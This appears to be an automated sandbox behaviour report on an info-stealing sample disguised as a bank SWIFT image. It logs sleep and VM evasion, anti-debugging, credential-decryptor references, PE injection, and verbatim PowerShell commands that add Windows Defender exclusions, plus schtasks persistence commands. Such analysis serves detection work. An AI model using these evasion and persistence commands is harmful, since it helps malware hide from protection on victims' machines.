Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596657s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -596063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595799s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595194s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -594282s >= -30000s
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596918s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595905s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595490s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595246s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7984	Thread sleep time: -594375s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598641
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598532
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598407
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598282
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598157
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597938
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597813
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597688
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596407
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596282
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595799
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595194
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594641
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594516
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594282
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597249
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596918
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596233
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595905
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595684
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595490
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595246
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594375

Source: Native_snake01.exe, 0000000A.00000002.2949665115.0000000000757000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.Ser
Source: BZTCUCKTKd.exe, 0000000F.00000002.1774903532.0000000001324000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_ '5
Source: Native_New-Nova.exe, 00000010.00000002.2947718476.000000000058E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: Native_New-Nova.exe, 00000009.00000002.2948783116.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2951107114.000000000066E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	API call chain: ExitProcess graph end node			graph_9-51218
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	API call chain: ExitProcess graph end node			graph_10-129378

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Code function: 9_2_05DF0040 LdrInitializeThunk,LdrInitializeThunk,

9_2_05DF0040

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,

9_2_0040ADB0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,	8_2_00401475
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_004123F1 SetUnhandledExceptionFilter,	10_2_004123F1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory written: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory written: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"

